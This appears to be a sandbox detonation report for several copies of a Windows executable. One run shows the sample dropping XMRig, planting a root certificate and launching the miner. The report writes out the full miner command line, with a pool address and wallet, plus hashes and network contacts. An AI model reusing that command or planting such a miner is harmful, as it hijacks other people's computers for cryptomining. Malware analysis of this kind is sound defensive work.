memory/2964-19-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-20-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-23-0x00000249357E0000-0x0000024935800000-memory.dmp

memory/2964-22-0x00000249357C0000-0x00000249357E0000-memory.dmp

memory/2964-21-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-24-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-25-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-26-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-27-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-28-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-29-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-30-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-31-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-32-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-33-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-34-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-35-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-36-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-37-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-38-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-39-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-40-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-41-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-42-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-43-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-44-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-45-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-46-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-47-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-48-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-49-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-50-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-51-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-52-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-53-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-54-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-55-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-56-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-57-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-58-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-59-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-60-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-61-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-62-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-63-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-64-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-65-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-66-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-67-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-68-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-69-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-70-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-71-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-72-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-73-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-74-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-75-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-76-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-77-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-78-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-79-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-80-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-81-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-82-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:34

Platform

win10v2004-20240226-en

Max time kernel

1796s

Max time network

1817s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3704 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3988 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.179.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
BE 104.90.25.175:80 www.microsoft.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 175.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 206.221.208.4.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 147.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1380-16-0x0000024E0E3F0000-0x0000024E0E410000-memory.dmp

memory/1380-17-0x0000024E0FCF0000-0x0000024E0FD10000-memory.dmp

memory/1380-18-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-20-0x0000024E0FD10000-0x0000024E0FD30000-memory.dmp

memory/1380-19-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-21-0x0000024EA26E0000-0x0000024EA2700000-memory.dmp

memory/1380-22-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-23-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-25-0x0000024EA26E0000-0x0000024EA2700000-memory.dmp

memory/1380-24-0x0000024E0FD10000-0x0000024E0FD30000-memory.dmp

memory/1380-26-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-27-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-28-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-29-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-30-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-31-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-32-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-33-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-34-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-35-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-36-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-37-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-38-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-39-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-40-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-41-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-42-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-43-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-44-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-45-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-46-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-47-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-48-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-49-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-50-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-51-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-52-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-53-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-54-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-55-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-56-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-57-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-58-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-59-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-60-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-61-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-62-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-63-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-64-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-65-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-66-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-67-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-68-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-69-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-70-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-71-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-72-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-73-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-74-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-75-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-76-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-77-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-78-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-79-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-80-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-81-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-82-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-83-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

memory/1380-84-0x00007FF711DE0000-0x00007FF7128E3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:34

Platform

win10v2004-20240508-en

Max time kernel

1691s

Max time network

1703s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:39

Platform

win10v2004-20240508-en

Max time kernel

1603s

Max time network

1616s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:44

Platform

win10v2004-20240508-en

Max time kernel

1706s

Max time network

1719s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A